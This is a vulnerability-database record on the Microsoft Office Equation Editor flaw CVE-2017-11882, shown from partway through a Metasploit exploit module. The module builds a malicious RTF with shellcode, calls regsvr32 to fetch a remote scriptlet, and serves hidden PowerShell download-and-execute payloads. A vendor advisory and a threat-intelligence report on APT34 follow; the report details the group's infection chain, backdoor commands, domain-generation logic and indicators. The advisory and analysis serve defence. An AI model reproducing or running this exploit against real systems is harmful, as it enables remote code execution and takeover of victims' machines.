else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n return header\n end\n\n\n\n def generate_rtf\n header = retrieve_header(datastore['FILENAME'])\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\n object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\n\n\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\n shellcode << \"\\x9e\" # 6: 9e sahf\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\n shellcode << \"\\\\\" # 12: 5c pop esp\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\n shellcode << \"\\xee\" # 15: ee out dx,al\n shellcode << \"[\" # 16: 5b pop ebx\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\n shellcode << \"\\x53\" # 3e: 53 push ebx\n shellcode << \"\\x51\" # 3f: 51 push ecx\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\n shellcode << \"\\x53\" # 49: 53 push ebx\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\n shellcode << \"\\x90\" # 50: 90 nop\n shellcode << \"\\x90\" # 50: 90 nop\n\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\n footer << '0000C5000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000001050000050000000D0000004D45544146494C'\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\n footer << '500000002001C0000000000050000000902000000000500000002'\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\n footer << '00030000000000' + \"\\n\"\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\n footer << \"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? \"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#{filename}'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb"}], "symantec": [{"lastseen": "2018-03-14T17:01:30", "bulletinFamily": "software", "cvelist": ["CVE-2017-11882"], "description": "### Description\n\nMicrosoft Office is prone to a memory-corruption vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Office 2007 SP3 \n * Microsoft Office 2010 (32-bit edition) SP2 \n * Microsoft Office 2010 (64-bit edition) SP2 \n * Microsoft Office 2013 Service Pack 1 (32-bit editions) \n * Microsoft Office 2013 Service Pack 1 (64-bit editions) \n * Microsoft Office 2016 (32-bit edition) \n * Microsoft Office 2016 (64-bit edition) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101757", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101757", "type": "symantec", "title": "Microsoft Office CVE-2017-11882 Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2018-08-31T00:18:23", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-0199"], "description": "Less than a week after Microsoft issued a patch for [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) on Nov. 14, 2017, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East. We assess this activity was carried out by a suspected Iranian cyber espionage threat group, whom we refer to as APT34, using a custom PowerShell backdoor to achieve its objectives.\n\nWe believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014. This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.\n\nAPT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a [spear phishing campaign](<https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html>) targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. We now attribute that campaign to APT34. In July 2017, we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER, based on strings within the malware. The backdoor was delivered via a malicious .rtf file that exploited [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>).\n\nIn this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER.\n\nThe full report on APT34 is available to our [MySIGHT customer community](<https://www.fireeye.com/products/isight-cyber-threat-intelligence-subscriptions.html>). APT34 loosely aligns with [public reporting related to the group \"OilRig\"](<https://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/>). As individual organizations may track adversaries using varied data sets, it is possible that our classifications of activity may not wholly align.\n\n#### CVE-2017-11882: Microsoft Office Stack Memory Corruption Vulnerability\n\nCVE-2017-11882 affects several versions of Microsoft Office and, when exploited, allows a remote user to run arbitrary code in the context of the current user as a result of improperly handling objects in memory. The vulnerability was patched by Microsoft on Nov. 14, 2017. A full proof of concept (POC) was publicly released a week later by the reporter of the vulnerability.\n\nThe vulnerability exists in the old Equation Editor (EQNEDT32.EXE), a component of Microsoft Office that is used to insert and evaluate mathematical formulas. The Equation Editor is embedded in Office documents using object linking and embedding (OLE) technology. It is created as a separate process instead of child process of Office applications. If a crafted formula is passed to the Equation Editor, it does not check the data length properly while copying the data, which results in stack memory corruption. As the EQNEDT32.exe is compiled using an older compiler and does not support address space layout randomization (ASLR), a technique that guards against the exploitation of memory corruption vulnerabilities, the attacker can easily alter the flow of program execution.\n\n#### Analysis\n\nAPT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a malicious spear phishing email sent to the victim organization. The malicious file exploits CVE-2017-11882, which corrupts the memory on the stack and then proceeds to push the malicious data to the stack. The malware then overwrites the function address with the address of an existing instruction from EQNEDT32.EXE. The overwritten instruction (displayed in Figure 1) is used to call the \u201cWinExec\u201d function from kernel32.dll, as depicted in the instruction at 00430c12, which calls the \u201cWinExec\u201d function.\n\n \nFigure 1: Disassembly of overwritten function address\n\nAfter exploitation, the \u2018WinExec\u2019 function is successfully called to create a child process, \u201cmshta.exe\u201d, in the context of current logged on user. The process \u201cmshta.exe\u201d downloads a malicious script from hxxp://mumbai-m[.]site/b.txt and executes it, as seen in Figure 2.\n\n \nFigure 2: Attacker data copied to corrupt stack buffer\n\n#### Execution Workflow\n\nThe malicious script goes through a series of steps to successfully execute and ultimately establish a connection to the command and control (C2) server. The full sequence of events starting with the exploit document is illustrated in Figure 3.\n\n \nFigure 3: CVE-2017-11882 and POWRUNER attack sequence\n\n 1. The malicious .rtf file exploits CVE-2017-11882.\n 2. The malware overwrites the function address with an existing instruction from EQNEDT32.EXE.\n 3. The malware creates a child process, \u201cmshta.exe,\u201d which downloads a file from: hxxp://mumbai-m[.]site/b.txt.\n 4. b.txt contains a PowerShell command to download a dropper from: hxxp://dns-update[.]club/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script.\n 5. The v.vbs script drops four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:\\ProgramData\\Windows\\Microsoft\\java\\\n 6. v.vbs uses CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services, to decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base, and drop hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory.\n 7. cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence.\n 8. GoogleUpdateschecker.vbs is executed after sleeping for five seconds.\n 9. cUpdateCheckers.bat and *.base are deleted from the staging directory.\n\nFigure 4 contains an excerpt of the v.vbs script pertaining to the Execution Workflow section.\n\n \nFigure 4: Execution Workflow Section of v.vbs\n\nAfter successful execution of the steps mentioned in the Execution Workflow section, the Task Scheduler will launch GoogleUpdateschecker.vbs every minute, which in turn executes the dUpdateCheckers.ps1 and hUpdateCheckers.ps1 scripts. These PowerShell scripts are final stage payloads \u2013 they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities. \n\n#### hUpdateCheckers.ps1 (POWRUNER)\n\nThe backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server. POWRUNER is executed every minute by the Task Scheduler. Figure 5 contains an excerpt of the POWRUNER backdoor.\n\n \nFigure 5: POWRUNER PowerShell script hUpdateCheckers.ps1\n\nPOWRUNER begins by sending a random GET request to the C2 server and waits for a response. The server will respond with either \u201cnot_now\u201d or a random 11-digit number. If the response is a random number, POWRUNER will send another random GET request to the server and store the response in a string. POWRUNER will then check the last digit of the stored random number response, interpret the value as a command, and perform an action based on that command. The command values and the associated actions are described in Table 1.\n\nCommand\n\n| \n\nDescription\n\n| \n\nAction \n \n---|---|--- \n \n0\n\n| \n\nServer response string contains batch commands\n\n| \n\nExecute batch commands and send results back to server \n \n1\n\n| \n\nServer response string is a file path\n\n| \n\nCheck for file path and upload (PUT) the file to server \n \n2\n\n| \n\nServer response string is a file path\n\n| \n\nCheck for file path and download (GET) the file \n \nTable 1: POWRUNER commands\n\nAfter successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution.\n\nThe C2 server can also send a PowerShell command to capture and store a screenshot of a victim\u2019s system. POWRUNER will send the captured screenshot image file to the C2 server if the \u201cfileupload\u201d command is issued. Figure 6 shows the PowerShell \u201cGet-Screenshot\u201d function sent by the C2 server.\n\n \nFigure 6: Powershell Screenshot Functionality\n\n#### dUpdateCheckers.ps1 (BONDUPDATER)\n\nOne of the recent advancements by APT34 is the use of DGA to generate subdomains. The BONDUPDATER script, which was named based on the hard-coded string \u201cB007\u201d, uses a custom DGA algorithm to generate subdomains for communication with the C2 server.\n\n#### DGA Implementation\n\nFigure 7 provides a breakdown of how an example domain (456341921300006B0C8B2CE9C9B007.mumbai-m[.]site) is generated using BONDUPDATER\u2019s custom DGA.\n\n \nFigure 7: Breakdown of subdomain created by BONDUPDATER\n\n 1. This is a randomly generated number created using the following expression: $rnd = -join (Get-Random -InputObject (10..99) -Count (%{ Get-Random -InputObject (1..6)}));\n 2. This value is either 0 or 1. It is initially set to 0. If the first resolved domain IP address starts with 24.125.X.X, then it is set to 1.\n 3. Initially set to 000, then incremented by 3 after every DNS request\n 4. First 12 characters of system UUID.\n 5. \u201cB007\u201d hardcoded string.\n 6. Hardcoded domain \u201cmumbai-m[.]site\u201d\n\nBONDUPDATER will attempt to resolve the resulting DGA domain and will take the following actions based on the IP address resolution:\n\n 1. Create a temporary file in %temp% location\n * The file created will have the last two octets of the resolved IP addresses as its filename.\n 2. BONDUPDATER will evaluate the last character of the file name and perform the corresponding action found in Table 2.\n\nCharacter\n\n| \n\nDescription \n \n---|--- \n \n0\n\n| \n\nFile contains batch commands, it executes the batch commands \n \n1\n\n| \n\nRename the temporary file as .ps1 extension \n \n2\n\n| \n\nRename the temporary file as .vbs extension \n \nTable 2: BONDUPDATER Actions\n\nFigure 8 is a screenshot of BONDUPDATER\u2019s DGA implementation.\n\n \nFigure 8: Domain Generation Algorithm\n\nSome examples of the generated subdomains observed at time of execution include:\n\n143610035BAF04425847B007.mumbai-m[.]site\n\n835710065BAF04425847B007.mumbai-m[.]site\n\n376110095BAF04425847B007.mumbai-m[.]site\n\n#### Network Communication\n\nFigure 9 shows example network communications between a POWRUNER backdoor client and server.\n\n \nFigure 9: Example Network Communication\n\nIn the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with \u20180\u2019, POWRUNER sends another random GET request to receive an additional command string. The C2 server sends back Base64 encoded response.\n\nIf the server had sent the string \u201cnot_now\u201d as response, as shown in Figure 10, POWRUNER would have ceased any further requests and terminated its execution.\n\n \nFigure 10: Example \"not now\" server response\n\n#### Batch Commands\n\nPOWRUNER may also receive batch commands from the C2 server to collect host information from the system. This may include information about the currently logged in user, the hostname, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data. An example batch command is provided in Figure 11.\n\n \nFigure 11: Batch commands sent by POWRUNER C2 server\n\n#### Additional Use of POWRUNER / BONDUPDATER\n\nAPT34 has used POWRUNER and BONDUPDATER to target Middle East organizations as early as July 2017. In July 2017, a FireEye Web MPS appliance detected and blocked a request to retrieve and install an APT34 POWRUNER / BONDUPDATER downloader file. During the same month, FireEye observed APT34 target a separate Middle East organization using a malicious .rtf file (MD5: 63D66D99E46FB93676A4F475A65566D8)** **that exploited CVE-2017-0199. This file issued a GET request to download a malicious file from:\n\nhxxp://94.23.172.164/dupdatechecker.doc.\n\nAs shown in Figure 12, the script within the dupatechecker.doc file attempts to download another file named dupatechecker.exe from the same server. The file also contains a comment by the malware author that appears to be an apparent taunt to security researchers.\n\n \nFigure 12: Contents of dupdatechecker.doc script\n\nThe dupatechecker.exe file (MD5: C9F16F0BE8C77F0170B9B6CE876ED7FB) drops both BONDUPDATER and POWRUNER. These files connect to proxychecker[.]pro for C2.\n\n#### Outlook and Implications\n\nRecent activity by APT34 demonstrates that they are capable group with potential access to their own development resources. During the past few months, APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities (CVE-2017-0199 and CVE-2017-11882)** **to target organizations in the Middle East. We assess that APT34\u2019s efforts to continuously update their malware, including the incorporation of DGA for C2, demonstrate the group\u2019s commitment to pursing strategies to deter detection. We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region.\n\n#### IOCs\n\n**Filename / Domain / IP Address**\n\n| \n\n**MD5 Hash or Description** \n \n---|--- \n \nCVE-2017-11882 exploit document\n\n| \n\nA0E6933F4E0497269620F44A083B2ED4 \n \nb.txt\n\n| \n\n9267D057C065EA7448ACA1511C6F29C7 \n \nv.txt/v.vbs\n\n| \n\nB2D13A336A3EB7BD27612BE7D4E334DF \n \ndUpdateCheckers.base\n\n| \n\n4A7290A279E6F2329EDD0615178A11FF \n \nhUpdateCheckers.base\n\n| \n\n841CE6475F271F86D0B5188E4F8BC6DB \n \ncUpdateCheckers.bat\n\n| \n\n52CA9A7424B3CC34099AD218623A0979 \n \ndUpdateCheckers.ps1\n\n| \n\nBBDE33F5709CB1452AB941C08ACC775E \n \nhUpdateCheckers.ps1\n\n| \n\n247B2A9FCBA6E9EC29ED818948939702 \n \nGoogleUpdateschecker.vbs\n\n| \n\nC87B0B711F60132235D7440ADD0360B0 \n \nhxxp://mumbai-m[.]site\n\n| \n\nPOWRUNER C2 \n \nhxxp://dns-update[.]club\n\n| \n\nMalware Staging Server \n \nCVE-2017-0199 exploit document\n\n| \n\n63D66D99E46FB93676A4F475A65566D8 \n \n94.23.172.164:80\n\n| \n\nMalware Staging Server \n \ndupdatechecker.doc\n\n| \n\nD85818E82A6E64CA185EDFDDBA2D1B76 \n \ndupdatechecker.exe\n\n| \n\nC9F16F0BE8C77F0170B9B6CE876ED7FB \n \nproxycheker[.]pro\n\n| \n\nC2 \n \n46.105.221.247\n\n| \n\nHas resolved mumbai-m[.]site &amp; hpserver[.]online \n \n148.251.55.110\n\n| \n\nHas resolved mumbai-m[.]site and dns-update[.]club \n 